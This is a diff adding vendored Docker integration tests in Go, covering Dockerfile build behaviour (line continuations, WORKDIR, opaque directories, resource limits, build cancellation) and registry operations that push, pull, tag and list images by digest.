+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Contains, "Step 1/2 : FROM busybox")
+	c.Assert(out, checker.Contains, "Step 2/2 : RUN echo hi\n")
+
+	_, out, err = buildImageWithOut(name,
+		`FROM busybox
+		 RUN echo hi \\`, true)
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Contains, "Step 1/2 : FROM busybox")
+	c.Assert(out, checker.Contains, "Step 2/2 : RUN echo hi \\\n")
+
+	_, out, err = buildImageWithOut(name,
+		`FROM busybox
+		 RUN echo hi \\\`, true)
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Contains, "Step 1/2 : FROM busybox")
+	c.Assert(out, checker.Contains, "Step 2/2 : RUN echo hi \\\\\n")
+}
+
+// TestBuildOpaqueDirectory tests that a build succeeds which
+// creates opaque directories.
+// See https://github.com/docker/docker/issues/25244
+func (s *DockerSuite) TestBuildOpaqueDirectory(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+
+	dockerFile := `
+		FROM busybox
+		RUN mkdir /dir1 && touch /dir1/f1
+		RUN rm -rf /dir1 && mkdir /dir1 && touch /dir1/f2
+		RUN touch /dir1/f3
+		RUN [ -f /dir1/f2 ]
+		`
+
+	// Test that build succeeds, last command fails if opaque directory
+	// was not handled correctly
+	_, err := buildImage("testopaquedirectory", dockerFile, false)
+	c.Assert(err, checker.IsNil)
+}
+
+// Windows test for USER in dockerfile
+func (s *DockerSuite) TestBuildWindowsUser(c *check.C) {
+	testRequires(c, DaemonIsWindows)
+	name := "testbuildwindowsuser"
+	_, out, err := buildImageWithOut(name,
+		`FROM `+WindowsBaseImage+`
+		RUN net user user /add
+		USER user
+		RUN set username
+		`,
+		true)
+	if err != nil {
+		c.Fatal(err)
+	}
+	c.Assert(strings.ToLower(out), checker.Contains, "username=user")
+}
+
+// Verifies if COPY file . when WORKDIR is set to a non-existing directory,
+// the directory is created and the file is copied into the directory,
+// as opposed to the file being copied as a file with the name of the
+// directory. Fix for 27545 (found on Windows, but regression good for Linux too).
+// Note 27545 was reverted in 28505, but a new fix was added subsequently in 28514.
+func (s *DockerSuite) TestBuildCopyFileDotWithWorkdir(c *check.C) {
+	name := "testbuildcopyfiledotwithworkdir"
+	ctx, err := fakeContext(`FROM busybox 
+WORKDIR /foo 
+COPY file . 
+RUN ["cat", "/foo/file"] 
+`,
+		map[string]string{})
+
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+
+	if err := ctx.Add("file", "content"); err != nil {
+		c.Fatal(err)
+	}
+
+	if _, err = buildImageFromContext(name, ctx, true); err != nil {
+		c.Fatal(err)
+	}
+}
+
+// Case-insensitive environment variables on Windows
+func (s *DockerSuite) TestBuildWindowsEnvCaseInsensitive(c *check.C) {
+	testRequires(c, DaemonIsWindows)
+	name := "testbuildwindowsenvcaseinsensitive"
+	if _, err := buildImage(name, `
+		FROM `+WindowsBaseImage+`
+		ENV FOO=bar foo=bar
+  `, true); err != nil {
+		c.Fatal(err)
+	}
+	res := inspectFieldJSON(c, name, "Config.Env")
+	if res != `["foo=bar"]` { // Should not have FOO=bar in it - takes the last one processed. And only one entry as deduped.
+		c.Fatalf("Case insensitive environment variables on Windows failed. Got %s", res)
+	}
+}
+
+// Test case for 29667
+func (s *DockerSuite) TestBuildWorkdirImageCmd(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+
+	image := "testworkdirimagecmd"
+	dockerfile := `
+FROM busybox
+WORKDIR /foo/bar
+`
+	out, err := buildImage(image, dockerfile, true)
+	c.Assert(err, checker.IsNil, check.Commentf("Output: %s", out))
+
+	out, _ = dockerCmd(c, "inspect", "--format", "{{ json .Config.Cmd }}", image)
+	c.Assert(strings.TrimSpace(out), checker.Equals, `["sh"]`)
+
+	image = "testworkdirlabelimagecmd"
+	dockerfile = `
+FROM busybox
+WORKDIR /foo/bar
+LABEL a=b
+`
+	out, err = buildImage(image, dockerfile, true)
+	c.Assert(err, checker.IsNil, check.Commentf("Output: %s", out))
+
+	out, _ = dockerCmd(c, "inspect", "--format", "{{ json .Config.Cmd }}", image)
+	c.Assert(strings.TrimSpace(out), checker.Equals, `["sh"]`)
+}
+
+// Test case for 28902/28090
+func (s *DockerSuite) TestBuildWorkdirCmd(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+
+	dockerFile := `
+                FROM golang:1.7-alpine
+                WORKDIR /
+                `
+	_, err := buildImage("testbuildworkdircmd", dockerFile, true)
+	c.Assert(err, checker.IsNil)
+
+	_, out, err := buildImageWithOut("testbuildworkdircmd", dockerFile, true)
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.Count(out, "Using cache"), checker.Equals, 1)
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_build_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_build_unix_test.go
new file mode 100644
index 0000000000..0205a927dd
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_build_unix_test.go
@@ -0,0 +1,207 @@
+// +build !windows
+
+package main
+
+import (
+	"bufio"
+	"bytes"
+	"encoding/json"
+	"io/ioutil"
+	"os"
+	"os/exec"
+	"path/filepath"
+	"regexp"
+	"strings"
+	"time"
+
+	"github.com/docker/docker/pkg/integration"
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/go-units"
+	"github.com/go-check/check"
+)
+
+func (s *DockerSuite) TestBuildResourceConstraintsAreUsed(c *check.C) {
+	testRequires(c, cpuCfsQuota)
+	name := "testbuildresourceconstraints"
+
+	ctx, err := fakeContext(`
+	FROM hello-world:frozen
+	RUN ["/hello"]
+	`, map[string]string{})
+	c.Assert(err, checker.IsNil)
+
+	_, _, err = dockerCmdInDir(c, ctx.Dir, "build", "--no-cache", "--rm=false", "--memory=64m", "--memory-swap=-1", "--cpuset-cpus=0", "--cpuset-mems=0", "--cpu-shares=100", "--cpu-quota=8000", "--ulimit", "nofile=42", "-t", name, ".")
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	out, _ := dockerCmd(c, "ps", "-lq")
+	cID := strings.TrimSpace(out)
+
+	type hostConfig struct {
+		Memory     int64
+		MemorySwap int64
+		CpusetCpus string
+		CpusetMems string
+		CPUShares  int64
+		CPUQuota   int64
+		Ulimits    []*units.Ulimit
+	}
+
+	cfg := inspectFieldJSON(c, cID, "HostConfig")
+
+	var c1 hostConfig
+	err = json.Unmarshal([]byte(cfg), &c1)
+	c.Assert(err, checker.IsNil, check.Commentf(cfg))
+
+	c.Assert(c1.Memory, checker.Equals, int64(64*1024*1024), check.Commentf("resource constraints not set properly for Memory"))
+	c.Assert(c1.MemorySwap, checker.Equals, int64(-1), check.Commentf("resource constraints not set properly for MemorySwap"))
+	c.Assert(c1.CpusetCpus, checker.Equals, "0", check.Commentf("resource constraints not set properly for CpusetCpus"))
+	c.Assert(c1.CpusetMems, checker.Equals, "0", check.Commentf("resource constraints not set properly for CpusetMems"))
+	c.Assert(c1.CPUShares, checker.Equals, int64(100), check.Commentf("resource constraints not set properly for CPUShares"))
+	c.Assert(c1.CPUQuota, checker.Equals, int64(8000), check.Commentf("resource constraints not set properly for CPUQuota"))
+	c.Assert(c1.Ulimits[0].Name, checker.Equals, "nofile", check.Commentf("resource constraints not set properly for Ulimits"))
+	c.Assert(c1.Ulimits[0].Hard, checker.Equals, int64(42), check.Commentf("resource constraints not set properly for Ulimits"))
+
+	// Make sure constraints aren't saved to image
+	dockerCmd(c, "run", "--name=test", name)
+
+	cfg = inspectFieldJSON(c, "test", "HostConfig")
+
+	var c2 hostConfig
+	err = json.Unmarshal([]byte(cfg), &c2)
+	c.Assert(err, checker.IsNil, check.Commentf(cfg))
+
+	c.Assert(c2.Memory, check.Not(checker.Equals), int64(64*1024*1024), check.Commentf("resource leaked from build for Memory"))
+	c.Assert(c2.MemorySwap, check.Not(checker.Equals), int64(-1), check.Commentf("resource leaked from build for MemorySwap"))
+	c.Assert(c2.CpusetCpus, check.Not(checker.Equals), "0", check.Commentf("resource leaked from build for CpusetCpus"))
+	c.Assert(c2.CpusetMems, check.Not(checker.Equals), "0", check.Commentf("resource leaked from build for CpusetMems"))
+	c.Assert(c2.CPUShares, check.Not(checker.Equals), int64(100), check.Commentf("resource leaked from build for CPUShares"))
+	c.Assert(c2.CPUQuota, check.Not(checker.Equals), int64(8000), check.Commentf("resource leaked from build for CPUQuota"))
+	c.Assert(c2.Ulimits, checker.IsNil, check.Commentf("resource leaked from build for Ulimits"))
+}
+
+func (s *DockerSuite) TestBuildAddChangeOwnership(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	name := "testbuildaddown"
+
+	ctx := func() *FakeContext {
+		dockerfile := `
+			FROM busybox
+			ADD foo /bar/
+			RUN [ $(stat -c %U:%G "/bar") = 'root:root' ]
+			RUN [ $(stat -c %U:%G "/bar/foo") = 'root:root' ]
+			`
+		tmpDir, err := ioutil.TempDir("", "fake-context")
+		c.Assert(err, check.IsNil)
+		testFile, err := os.Create(filepath.Join(tmpDir, "foo"))
+		if err != nil {
+			c.Fatalf("failed to create foo file: %v", err)
+		}
+		defer testFile.Close()
+
+		chownCmd := exec.Command("chown", "daemon:daemon", "foo")
+		chownCmd.Dir = tmpDir
+		out, _, err := runCommandWithOutput(chownCmd)
+		if err != nil {
+			c.Fatal(err, out)
+		}
+
+		if err := ioutil.WriteFile(filepath.Join(tmpDir, "Dockerfile"), []byte(dockerfile), 0644); err != nil {
+			c.Fatalf("failed to open destination dockerfile: %v", err)
+		}
+		return fakeContextFromDir(tmpDir)
+	}()
+
+	defer ctx.Close()
+
+	if _, err := buildImageFromContext(name, ctx, true); err != nil {
+		c.Fatalf("build failed to complete for TestBuildAddChangeOwnership: %v", err)
+	}
+}
+
+// Test that an infinite sleep during a build is killed if the client disconnects.
+// This test is fairly hairy because there are lots of ways to race.
+// Strategy:
+// * Monitor the output of docker events starting from before
+// * Run a 1-year-long sleep from a docker build.
+// * When docker events sees container start, close the "docker build" command
+// * Wait for docker events to emit a dying event.
+func (s *DockerSuite) TestBuildCancellationKillsSleep(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	name := "testbuildcancellation"
+
+	observer, err := newEventObserver(c)
+	c.Assert(err, checker.IsNil)
+	err = observer.Start()
+	c.Assert(err, checker.IsNil)
+	defer observer.Stop()
+
+	// (Note: one year, will never finish)
+	ctx, err := fakeContext("FROM busybox\nRUN sleep 31536000", nil)
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+
+	buildCmd := exec.Command(dockerBinary, "build", "-t", name, ".")
+	buildCmd.Dir = ctx.Dir
+
+	stdoutBuild, err := buildCmd.StdoutPipe()
+	if err := buildCmd.Start(); err != nil {
+		c.Fatalf("failed to run build: %s", err)
+	}
+
+	matchCID := regexp.MustCompile("Running in (.+)")
+	scanner := bufio.NewScanner(stdoutBuild)
+
+	outputBuffer := new(bytes.Buffer)
+	var buildID string
+	for scanner.Scan() {
+		line := scanner.Text()
+		outputBuffer.WriteString(line)
+		outputBuffer.WriteString("\n")
+		if matches := matchCID.FindStringSubmatch(line); len(matches) > 0 {
+			buildID = matches[1]
+			break
+		}
+	}
+
+	if buildID == "" {
+		c.Fatalf("Unable to find build container id in build output:\n%s", outputBuffer.String())
+	}
+
+	testActions := map[string]chan bool{
+		"start": make(chan bool, 1),
+		"die":   make(chan bool, 1),
+	}
+
+	matcher := matchEventLine(buildID, "container", testActions)
+	processor := processEventMatch(testActions)
+	go observer.Match(matcher, processor)
+
+	select {
+	case <-time.After(10 * time.Second):
+		observer.CheckEventError(c, buildID, "start", matcher)
+	case <-testActions["start"]:
+		// ignore, done
+	}
+
+	// Send a kill to the `docker build` command.
+	// Causes the underlying build to be cancelled due to socket close.
+	if err := buildCmd.Process.Kill(); err != nil {
+		c.Fatalf("error killing build command: %s", err)
+	}
+
+	// Get the exit status of `docker build`, check it exited because killed.
+	if err := buildCmd.Wait(); err != nil && !integration.IsKilled(err) {
+		c.Fatalf("wait failed during build run: %T %s", err, err)
+	}
+
+	select {
+	case <-time.After(10 * time.Second):
+		observer.CheckEventError(c, buildID, "die", matcher)
+	case <-testActions["die"]:
+		// ignore, done
+	}
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_by_digest_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_by_digest_test.go
new file mode 100644
index 0000000000..c2d85461a8
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_by_digest_test.go
@@ -0,0 +1,693 @@
+package main
+
+import (
+	"encoding/json"
+	"fmt"
+	"os"
+	"path/filepath"
+	"regexp"
+	"strings"
+
+	"github.com/docker/distribution/digest"
+	"github.com/docker/distribution/manifest/schema1"
+	"github.com/docker/distribution/manifest/schema2"
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/pkg/stringutils"
+	"github.com/go-check/check"
+)
+
+var (
+	remoteRepoName  = "dockercli/busybox-by-dgst"
+	repoName        = fmt.Sprintf("%s/%s", privateRegistryURL, remoteRepoName)
+	pushDigestRegex = regexp.MustCompile("[\\S]+: digest: ([\\S]+) size: [0-9]+")
+	digestRegex     = regexp.MustCompile("Digest: ([\\S]+)")
+)
+
+func setupImage(c *check.C) (digest.Digest, error) {
+	return setupImageWithTag(c, "latest")
+}
+
+func setupImageWithTag(c *check.C, tag string) (digest.Digest, error) {
+	containerName := "busyboxbydigest"
+
+	dockerCmd(c, "run", "-e", "digest=1", "--name", containerName, "busybox")
+
+	// tag the image to upload it to the private registry
+	repoAndTag := repoName + ":" + tag
+	out, _, err := dockerCmdWithError("commit", containerName, repoAndTag)
+	c.Assert(err, checker.IsNil, check.Commentf("image tagging failed: %s", out))
+
+	// delete the container as we don't need it any more
+	err = deleteContainer(containerName)
+	c.Assert(err, checker.IsNil)
+
+	// push the image
+	out, _, err = dockerCmdWithError("push", repoAndTag)
+	c.Assert(err, checker.IsNil, check.Commentf("pushing the image to the private registry has failed: %s", out))
+
+	// delete our local repo that we previously tagged
+	rmiout, _, err := dockerCmdWithError("rmi", repoAndTag)
+	c.Assert(err, checker.IsNil, check.Commentf("error deleting images prior to real test: %s", rmiout))
+
+	matches := pushDigestRegex.FindStringSubmatch(out)
+	c.Assert(matches, checker.HasLen, 2, check.Commentf("unable to parse digest from push output: %s", out))
+	pushDigest := matches[1]
+
+	return digest.Digest(pushDigest), nil
+}
+
+func testPullByTagDisplaysDigest(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	pushDigest, err := setupImage(c)
+	c.Assert(err, checker.IsNil, check.Commentf("error setting up image"))
+
+	// pull from the registry using the tag
+	out, _ := dockerCmd(c, "pull", repoName)
+
+	// the pull output includes "Digest: <digest>", so find that
+	matches := digestRegex.FindStringSubmatch(out)
+	c.Assert(matches, checker.HasLen, 2, check.Commentf("unable to parse digest from pull output: %s", out))
+	pullDigest := matches[1]
+
+	// make sure the pushed and pull digests match
+	c.Assert(pushDigest.String(), checker.Equals, pullDigest)
+}
+
+func (s *DockerRegistrySuite) TestPullByTagDisplaysDigest(c *check.C) {
+	testPullByTagDisplaysDigest(c)
+}
+
+func (s *DockerSchema1RegistrySuite) TestPullByTagDisplaysDigest(c *check.C) {
+	testPullByTagDisplaysDigest(c)
+}
+
+func testPullByDigest(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	pushDigest, err := setupImage(c)
+	c.Assert(err, checker.IsNil, check.Commentf("error setting up image"))
+
+	// pull from the registry using the <name>@<digest> reference
+	imageReference := fmt.Sprintf("%s@%s", repoName, pushDigest)
+	out, _ := dockerCmd(c, "pull", imageReference)
+
+	// the pull output includes "Digest: <digest>", so find that
+	matches := digestRegex.FindStringSubmatch(out)
+	c.Assert(matches, checker.HasLen, 2, check.Commentf("unable to parse digest from pull output: %s", out))
+	pullDigest := matches[1]
+
+	// make sure the pushed and pull digests match
+	c.Assert(pushDigest.String(), checker.Equals, pullDigest)
+}
+
+func (s *DockerRegistrySuite) TestPullByDigest(c *check.C) {
+	testPullByDigest(c)
+}
+
+func (s *DockerSchema1RegistrySuite) TestPullByDigest(c *check.C) {
+	testPullByDigest(c)
+}
+
+func testPullByDigestNoFallback(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	// pull from the registry using the <name>@<digest> reference
+	imageReference := fmt.Sprintf("%s@sha256:ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff", repoName)
+	out, _, err := dockerCmdWithError("pull", imageReference)
+	c.Assert(err, checker.NotNil, check.Commentf("expected non-zero exit status and correct error message when pulling non-existing image"))
+	c.Assert(out, checker.Contains, fmt.Sprintf("manifest for %s not found", imageReference), check.Commentf("expected non-zero exit status and correct error message when pulling non-existing image"))
+}
+
+func (s *DockerRegistrySuite) TestPullByDigestNoFallback(c *check.C) {
+	testPullByDigestNoFallback(c)
+}
+
+func (s *DockerSchema1RegistrySuite) TestPullByDigestNoFallback(c *check.C) {
+	testPullByDigestNoFallback(c)
+}
+
+func (s *DockerRegistrySuite) TestCreateByDigest(c *check.C) {
+	pushDigest, err := setupImage(c)
+	c.Assert(err, checker.IsNil, check.Commentf("error setting up image"))
+
+	imageReference := fmt.Sprintf("%s@%s", repoName, pushDigest)
+
+	containerName := "createByDigest"
+	dockerCmd(c, "create", "--name", containerName, imageReference)
+
+	res := inspectField(c, containerName, "Config.Image")
+	c.Assert(res, checker.Equals, imageReference)
+}
+
+func (s *DockerRegistrySuite) TestRunByDigest(c *check.C) {
+	pushDigest, err := setupImage(c)
+	c.Assert(err, checker.IsNil)
+
+	imageReference := fmt.Sprintf("%s@%s", repoName, pushDigest)
+
+	containerName := "runByDigest"
+	out, _ := dockerCmd(c, "run", "--name", containerName, imageReference, "sh", "-c", "echo found=$digest")
+
+	foundRegex := regexp.MustCompile("found=([^\n]+)")
+	matches := foundRegex.FindStringSubmatch(out)
+	c.Assert(matches, checker.HasLen, 2, check.Commentf("unable to parse digest from pull output: %s", out))
+	c.Assert(matches[1], checker.Equals, "1", check.Commentf("Expected %q, got %q", "1", matches[1]))
+
+	res := inspectField(c, containerName, "Config.Image")
+	c.Assert(res, checker.Equals, imageReference)
+}
+
+func (s *DockerRegistrySuite) TestRemoveImageByDigest(c *check.C) {
+	digest, err := setupImage(c)
+	c.Assert(err, checker.IsNil, check.Commentf("error setting up image"))
+
+	imageReference := fmt.Sprintf("%s@%s", repoName, digest)
+
+	// pull from the registry using the <name>@<digest> reference
+	dockerCmd(c, "pull", imageReference)
+
+	// make sure inspect runs ok
+	inspectField(c, imageReference, "Id")
+
+	// do the delete
+	err = deleteImages(imageReference)
+	c.Assert(err, checker.IsNil, check.Commentf("unexpected error deleting image"))
+
+	// try to inspect again - it should error this time
+	_, err = inspectFieldWithError(imageReference, "Id")
+	//unexpected nil err trying to inspect what should be a non-existent image
+	c.Assert(err, checker.NotNil)
+	c.Assert(err.Error(), checker.Contains, "No such object")
+}
+
+func (s *DockerRegistrySuite) TestBuildByDigest(c *check.C) {
+	digest, err := setupImage(c)
+	c.Assert(err, checker.IsNil, check.Commentf("error setting up image"))
+
+	imageReference := fmt.Sprintf("%s@%s", repoName, digest)
+
+	// pull from the registry using the <name>@<digest> reference
+	dockerCmd(c, "pull", imageReference)
+
+	// get the image id
+	imageID := inspectField(c, imageReference, "Id")
+
+	// do the build
+	name := "buildbydigest"
+	_, err = buildImage(name, fmt.Sprintf(
+		`FROM %s
+     CMD ["/bin/echo", "Hello World"]`, imageReference),
+		true)
+	c.Assert(err, checker.IsNil)
+
+	// get the build's image id
+	res := inspectField(c, name, "Config.Image")
+	// make sure they match
+	c.Assert(res, checker.Equals, imageID)
+}
+
+func (s *DockerRegistrySuite) TestTagByDigest(c *check.C) {
+	digest, err := setupImage(c)
+	c.Assert(err, checker.IsNil, check.Commentf("error setting up image"))
+
+	imageReference := fmt.Sprintf("%s@%s", repoName, digest)
+
+	// pull from the registry using the <name>@<digest> reference
+	dockerCmd(c, "pull", imageReference)
+
+	// tag it
+	tag := "tagbydigest"
+	dockerCmd(c, "tag", imageReference, tag)
+
+	expectedID := inspectField(c, imageReference, "Id")
+
+	tagID := inspectField(c, tag, "Id")
+	c.Assert(tagID, checker.Equals, expectedID)
+}
+
+func (s *DockerRegistrySuite) TestListImagesWithoutDigests(c *check.C) {
+	digest, err := setupImage(c)
+	c.Assert(err, checker.IsNil, check.Commentf("error setting up image"))
+
+	imageReference := fmt.Sprintf("%s@%s", repoName, digest)
+
+	// pull from the registry using the <name>@<digest> reference
+	dockerCmd(c, "pull", imageReference)
+
+	out, _ := dockerCmd(c, "images")
+	c.Assert(out, checker.Not(checker.Contains), "DIGEST", check.Commentf("list output should not have contained DIGEST header"))
+}
+
+func (s *DockerRegistrySuite) TestListImagesWithDigests(c *check.C) {
+
+	// setup image1
+	digest1, err := setupImageWithTag(c, "tag1")
+	c.Assert(err, checker.IsNil, check.Commentf("error setting up image"))
+	imageReference1 := fmt.Sprintf("%s@%s", repoName, digest1)
+	c.Logf("imageReference1 = %s", imageReference1)
+
+	// pull image1 by digest
+	dockerCmd(c, "pull", imageReference1)
+
+	// list images
+	out, _ := dockerCmd(c, "images", "--digests")
+
+	// make sure repo shown, tag=<none>, digest = $digest1
+	re1 := regexp.MustCompile(`\s*` + repoName + `\s*<none>\s*` + digest1.String() + `\s`)
+	c.Assert(re1.MatchString(out), checker.True, check.Commentf("expected %q: %s", re1.String(), out))
+	// setup image2
+	digest2, err := setupImageWithTag(c, "tag2")
+	//error setting up image
+	c.Assert(err, checker.IsNil)
+	imageReference2 := fmt.Sprintf("%s@%s", repoName, digest2)
+	c.Logf("imageReference2 = %s", imageReference2)
+
+	// pull image1 by digest
+	dockerCmd(c, "pull", imageReference1)
+
+	// pull image2 by digest
+	dockerCmd(c, "pull", imageReference2)
+
+	// list images
+	out, _ = dockerCmd(c, "images", "--digests")
+
+	// make sure repo shown, tag=<none>, digest = $digest1
+	c.Assert(re1.MatchString(out), checker.True, check.Commentf("expected %q: %s", re1.String(), out))
+
+	// make sure repo shown, tag=<none>, digest = $digest2
+	re2 := regexp.MustCompile(`\s*` + repoName + `\s*<none>\s*` + digest2.String() + `\s`)
+	c.Assert(re2.MatchString(out), checker.True, check.Commentf("expected %q: %s", re2.String(), out))
+
+	// pull tag1
+	dockerCmd(c, "pull", repoName+":tag1")
+
+	// list images
+	out, _ = dockerCmd(c, "images", "--digests")
+
+	// make sure image 1 has repo, tag, <none> AND repo, <none>, digest
+	reWithDigest1 := regexp.MustCompile(`\s*` + repoName + `\s*tag1\s*` + digest1.String() + `\s`)
+	c.Assert(reWithDigest1.MatchString(out), checker.True, check.Commentf("expected %q: %s", reWithDigest1.String(), out))
+	// make sure image 2 has repo, <none>, digest
+	c.Assert(re2.MatchString(out), checker.True, check.Commentf("expected %q: %s", re2.String(), out))
+
+	// pull tag 2
+	dockerCmd(c, "pull", repoName+":tag2")
+
+	// list images
+	out, _ = dockerCmd(c, "images", "--digests")
+
+	// make sure image 1 has repo, tag, digest
+	c.Assert(reWithDigest1.MatchString(out), checker.True, check.Commentf("expected %q: %s", reWithDigest1.String(), out))
+
+	// make sure image 2 has repo, tag, digest
+	reWithDigest2 := regexp.MustCompile(`\s*` + repoName + `\s*tag2\s*` + digest2.String() + `\s`)
+	c.Assert(reWithDigest2.MatchString(out), checker.True, check.Commentf("expected %q: %s", reWithDigest2.String(), out))
+
+	// list images
+	out, _ = dockerCmd(c, "images", "--digests")
+
+	// make sure image 1 has repo, tag, digest
+	c.Assert(reWithDigest1.MatchString(out), checker.True, check.Commentf("expected %q: %s", reWithDigest1.String(), out))
+	// make sure image 2 has repo, tag, digest
+	c.Assert(reWithDigest2.MatchString(out), checker.True, check.Commentf("expected %q: %s", reWithDigest2.String(), out))
+	// make sure busybox has tag, but not digest
+	busyboxRe := regexp.MustCompile(`\s*busybox\s*latest\s*<none>\s`)
+	c.Assert(busyboxRe.MatchString(out), checker.True, check.Commentf("expected %q: %s", busyboxRe.String(), out))
+}
+
+func (s *DockerRegistrySuite) TestListDanglingImagesWithDigests(c *check.C) {
+	// setup image1
+	digest1, err := setupImageWithTag(c, "dangle1")
+	c.Assert(err, checker.IsNil, check.Commentf("error setting up image"))
+	imageReference1 := fmt.Sprintf("%s@%s", repoName, digest1)
+	c.Logf("imageReference1 = %s", imageReference1)
+
+	// pull image1 by digest
+	dockerCmd(c, "pull", imageReference1)
+
+	// list images
+	out, _ := dockerCmd(c, "images", "--digests")
+
+	// make sure repo shown, tag=<none>, digest = $digest1
+	re1 := regexp.MustCompile(`\s*` + repoName + `\s*<none>\s*` + digest1.String() + `\s`)
+	c.Assert(re1.MatchString(out), checker.True, check.Commentf("expected %q: %s", re1.String(), out))
+	// setup image2
+	digest2, err := setupImageWithTag(c, "dangle2")
+	//error setting up image
+	c.Assert(err, checker.IsNil)
+	imageReference2 := fmt.Sprintf("%s@%s", repoName, digest2)
+	c.Logf("imageReference2 = %s", imageReference2)
+
+	// pull image1 by digest
+	dockerCmd(c, "pull", imageReference1)
+
+	// pull image2 by digest
+	dockerCmd(c, "pull", imageReference2)
+
+	// list images
+	out, _ = dockerCmd(c, "images", "--digests", "--filter=dangling=true")
+
+	// make sure repo shown, tag=<none>, digest = $digest1
+	c.Assert(re1.MatchString(out), checker.True, check.Commentf("expected %q: %s", re1.String(), out))
+
+	// make sure repo shown, tag=<none>, digest = $digest2
+	re2 := regexp.MustCompile(`\s*` + repoName + `\s*<none>\s*` + digest2.String() + `\s`)
+	c.Assert(re2.MatchString(out), checker.True, check.Commentf("expected %q: %s", re2.String(), out))
+
+	// pull dangle1 tag
+	dockerCmd(c, "pull", repoName+":dangle1")
+
+	// list images
+	out, _ = dockerCmd(c, "images", "--digests", "--filter=dangling=true")
+
+	// make sure image 1 has repo, tag, <none> AND repo, <none>, digest
+	reWithDigest1 := regexp.MustCompile(`\s*` + repoName + `\s*dangle1\s*` + digest1.String() + `\s`)
+	c.Assert(reWithDigest1.MatchString(out), checker.False, check.Commentf("unexpected %q: %s", reWithDigest1.String(), out))
+	// make sure image 2 has repo, <none>, digest
+	c.Assert(re2.MatchString(out), checker.True, check.Commentf("expected %q: %s", re2.String(), out))
+
+	// pull dangle2 tag
+	dockerCmd(c, "pull", repoName+":dangle2")
+
+	// list images, show tagged images
+	out, _ = dockerCmd(c, "images", "--digests")
+
+	// make sure image 1 has repo, tag, digest
+	c.Assert(reWithDigest1.MatchString(out), checker.True, check.Commentf("expected %q: %s", reWithDigest1.String(), out))
+
+	// make sure image 2 has repo, tag, digest
+	reWithDigest2 := regexp.MustCompile(`\s*` + repoName + `\s*dangle2\s*` + digest2.String() + `\s`)
+	c.Assert(reWithDigest2.MatchString(out), checker.True, check.Commentf("expected %q: %s", reWithDigest2.String(), out))
+
+	// list images, no longer dangling, should not match
+	out, _ = dockerCmd(c, "images", "--digests", "--filter=dangling=true")
+
+	// make sure image 1 has repo, tag, digest
+	c.Assert(reWithDigest1.MatchString(out), checker.False, check.Commentf("unexpected %q: %s", reWithDigest1.String(), out))
+	// make sure image 2 has repo, tag, digest
+	c.Assert(reWithDigest2.MatchString(out), checker.False, check.Commentf("unexpected %q: %s", reWithDigest2.String(), out))
+}
+
+func (s *DockerRegistrySuite) TestInspectImageWithDigests(c *check.C) {
+	digest, err := setupImage(c)
+	c.Assert(err, check.IsNil, check.Commentf("error setting up image"))
+
+	imageReference := fmt.Sprintf("%s@%s", repoName, digest)
+
+	// pull from the registry using the <name>@<digest> reference
+	dockerCmd(c, "pull", imageReference)
+
+	out, _ := dockerCmd(c, "inspect", imageReference)
+
+	var imageJSON []types.ImageInspect
+	err = json.Unmarshal([]byte(out), &imageJSON)
+	c.Assert(err, checker.IsNil)
+	c.Assert(imageJSON, checker.HasLen, 1)
+	c.Assert(imageJSON[0].RepoDigests, checker.HasLen, 1)
+	c.Assert(stringutils.InSlice(imageJSON[0].RepoDigests, imageReference), checker.Equals, true)
+}
+
+func (s *DockerRegistrySuite) TestPsListContainersFilterAncestorImageByDigest(c *check.C) {
+	digest, err := setupImage(c)
+	c.Assert(err, checker.IsNil, check.Commentf("error setting up image"))
+
+	imageReference := fmt.Sprintf("%s@%s", repoName, digest)
+
+	// pull from the registry using the <name>@<digest> reference
+	dockerCmd(c, "pull", imageReference)
+
+	// build an image from it
+	imageName1 := "images_ps_filter_test"
+	_, err = buildImage(imageName1, fmt.Sprintf(
+		`FROM %s
+		 LABEL match me 1`, imageReference), true)
+	c.Assert(err, checker.IsNil)
+
+	// run a container based on that
+	dockerCmd(c, "run", "--name=test1", imageReference, "echo", "hello")
+	expectedID, err := getIDByName("test1")
+	c.Assert(err, check.IsNil)
+
+	// run a container based on the a descendant of that too
+	dockerCmd(c, "run", "--name=test2", imageName1, "echo", "hello")
+	expectedID1, err := getIDByName("test2")
+	c.Assert(err, check.IsNil)
+
+	expectedIDs := []string{expectedID, expectedID1}
+
+	// Invalid imageReference
+	out, _ := dockerCmd(c, "ps", "-a", "-q", "--no-trunc", fmt.Sprintf("--filter=ancestor=busybox@%s", digest))
+	// Filter container for ancestor filter should be empty
+	c.Assert(strings.TrimSpace(out), checker.Equals, "")
+
+	// Valid imageReference
+	out, _ = dockerCmd(c, "ps", "-a", "-q", "--no-trunc", "--filter=ancestor="+imageReference)
+	checkPsAncestorFilterOutput(c, out, imageReference, expectedIDs)
+}
+
+func (s *DockerRegistrySuite) TestDeleteImageByIDOnlyPulledByDigest(c *check.C) {
+	pushDigest, err := setupImage(c)
+	c.Assert(err, checker.IsNil, check.Commentf("error setting up image"))
+
+	// pull from the registry using the <name>@<digest> reference
+	imageReference := fmt.Sprintf("%s@%s", repoName, pushDigest)
+	dockerCmd(c, "pull", imageReference)
+	// just in case...
+
